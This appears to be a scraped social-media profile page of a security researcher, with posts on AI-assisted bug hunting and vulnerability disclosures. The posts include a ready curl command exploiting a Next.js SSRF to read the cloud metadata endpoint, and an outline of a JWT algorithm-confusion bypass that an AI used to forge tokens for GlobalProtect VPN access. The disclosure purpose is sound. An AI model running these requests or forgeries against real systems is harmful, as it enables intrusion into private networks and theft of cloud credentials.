Olivia
Online
Harsh Jaiswal
@rootxharsh
Building @hacktronai | researching at @httpvoid0x2f | auditing at
@cure53berlin | prev @zomato @vimeo @pdiscoveryio
Joined April 2015
1.2K Following
22.3K Followers
3.3K Posts
Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle.
AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.
Models tend to set up very bruteforce-able passwords in most cases. Related to company name, year, task, context, etc. Golden era for credential brute-force attacks in the coming months.
its a great feeling to see the thing you worked on for over a year starts creating value
@pyn3rd Think so too!
Who to follow
Frans Rosén
@fransrosen
Co-founder of @centrahq/@detectify/@poweredbyingrid. I do not advertise doing hacking services, do not trust the ones telling you I do.
Geekboy
@emgeekboy
Hacker, Co-Founder @pdiscoveryio, Ex-Security Analyst / BugBounty @Hacker0x01
publiclyDisclosed
@disclosedh1
This is an unofficial HackerOne public disclosure watcher who keeps you up to date about the recently disclosed bugs. By @NOBBD
Can Mythos find React2Shell and exploit it?
Last year, on a vacation, @S1r1u5_ and I were discussing about the human need for validation and how most things we do can be tied to it, consciously or subconsciously.
Mohan asked, Would you still be doing what you do (hacking, publishing blogs, competing, etc.) if no one was there to see it? At that time, my answer was "yeah, probably?"
Today, the world has somewhat come to that. All the things you thought gave you validation are now norms. Things you once took pride in can be replicated in a few prompts. I mean, people are dropping 0days everyday now, and there's an unlikely chance of your blog getting reads so there goes that validation. So would you still do it on your own? For your own sake and sanity?
My answer is a confident yes now.
In the last couple of months, I've seen models find bugs autonomously or sometimes with just a bit of a hunch from me, but sharing these bugs publicly hasn't been rewarding. And not in the sense of likes or reach alone, I've just been less motivated overall. I have a few blogs sitting in my queue, and what I'm noticing is I keep procrastinating, because there's not much authenticity to my own work in them, and I don't have the enthusiasm to share the same story again, how the model found this and that. I think if you really love the game, sooner or later, you have to come to terms with the fact that to stay sane, you need to go back to that problem-solving phase, otherwise it gets pretty depressing. As much as I love watching LLMs find bugs, it feels soulless at times.. all this is a signal to me that I can't function like this in the long run. It makes me feel dopamine-deprived, and I need to be hacking shit on my own..
Now, when I say "on my own", I don't mean no AI, AI bad. No, not at all.. There's a big difference between using an LLM as an accelerator in your work vs delegating your understanding to it. From a long-term pov, the former is the only path imo, and even then, the mind map you build on your own is very different from the one you'd end up with leaning on LLMs. The dopamine hit isn't even close to figuring shit out on your own.
Seeing how AI is making 0days the norm and CTFs no longer the same.. The question is more real now than ever. Would you still sit down and hack stuff even when no one's watching, knowing people might be on top of the leaderboard via AI, just for the love for the game?
StubZero: $148,337 RCE in Google Cloud Production
https://t.co/m7cBnSTaj4
@HacktronAI https://t.co/xMBbKC60NZ
This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps!
Unlike the buffer overflow this isn't limited to PAN OS.
Will be disclosing full details later next week on @HacktronAI blog.
https://t.co/iby50nmGdF
After configuring CAS on my instance, and trust me, this was the toughest part of the journey. Once done, Claude forged a JWT, POSTs it to /SAML20/SP/ACS, and gets a session cookie/tokens which can be used to connect to the VPN.
It was game over. Your private network was public. If you're running CAS-enabled PAN-OS, update the appliance immediately.
When Your VPN Opens Your Private Network to the Public!
An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN.
Blog - https://t.co/xMBbKC60NZ
I pointed Claude to start diving into the CAS implementation in the shared libraries, and in just a few minutes, it had found a textbook JWT algorithm confusion. The verification function trusts the alg header from the JWT itself. Switch RS256 to HS256, and the public signing certificate becomes the HMAC secret key. I couldn't believe it at first, this in 2026??
im tired boss..
We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.
@LiveOverflow infosec community pandemic
There are a few more interesting bugs, check those out here:
https://t.co/BxTWolGpSI
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI
CVE-2026-44578: SSRF via WebSocket upgrade.
It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
"http://target:3000" \
--request-target "http://169.254.169.254/latest/meta-data/"
CVE-2026-44574: Middleware auth bypass via internal query params.
Next.js uses internal query params nxtP<param> and nxtI<param> to pass resolved dynamic route params from routing to route modules. they're never stripped from external requests, leading to middleware bypass in dynamic routes.
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.7M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.3M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
60.9M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers